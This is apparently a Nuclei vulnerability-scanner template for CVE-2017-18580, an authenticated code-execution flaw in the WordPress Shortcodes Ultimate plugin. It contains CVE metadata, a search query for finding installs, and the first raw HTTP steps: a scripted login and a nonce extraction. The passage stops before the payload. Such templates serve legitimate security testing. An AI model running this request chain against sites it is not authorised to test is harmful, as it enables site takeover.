id: CVE-2017-18580 info: name: WordPress Shortcodes Ultimate <= 5.0.0 - Authenticated Remote Code Execution author: 0x_Akoko severity: critical description: | Shortcodes Ultimate plugin before 5.0.1 for WordPress contains a remote code execution caused by a filter in meta, post, or user shortcode, letting remote attackers execute arbitrary code, exploit requires sending crafted shortcode data. impact: | Remote attackers can execute arbitrary code on the server, potentially leading to full site compromise. remediation: | Update to version 5.0.1 or later. reference: - https://wpscan.com/vulnerability/efad59c8-e6ae-4167-9c78-d3ea52fe5bba/ - https://plugins.trac.wordpress.org/changeset/1756323/shortcodes-ultimate - https://blog.sucuri.net/2017/11/formidable-forms-shortcodes-ultimate-exploits-in-the-wild.html - https://nvd.nist.gov/vuln/detail/CVE-2017-18580 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-18580 cwe-id: CWE-94 epss-score: 0.70003 epss-percentile: 0.98696 metadata: verified: true max-request: 4 vendor: developer_developer product: shortcodes-ultimate framework: wordpress publicwww-query: "/wp-content/plugins/shortcodes-ultimate/" tags: cve,cve2017,wordpress,wp-plugin,shortcodes-ultimate,rce,authenticated,oast,wp,vkev flow: http(1) && http(2) && http(3) && http(4) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - status_code == 302 - contains(header, "wordpress_logged_in") condition: and internal: true - raw: - | GET /wp-admin/post-new.php HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains(body, "_wpnonce") condition: and internal: true extractors: - type: regex name: nonce part: body internal: true group: 1 regex: - 'metabox-base-form">\s*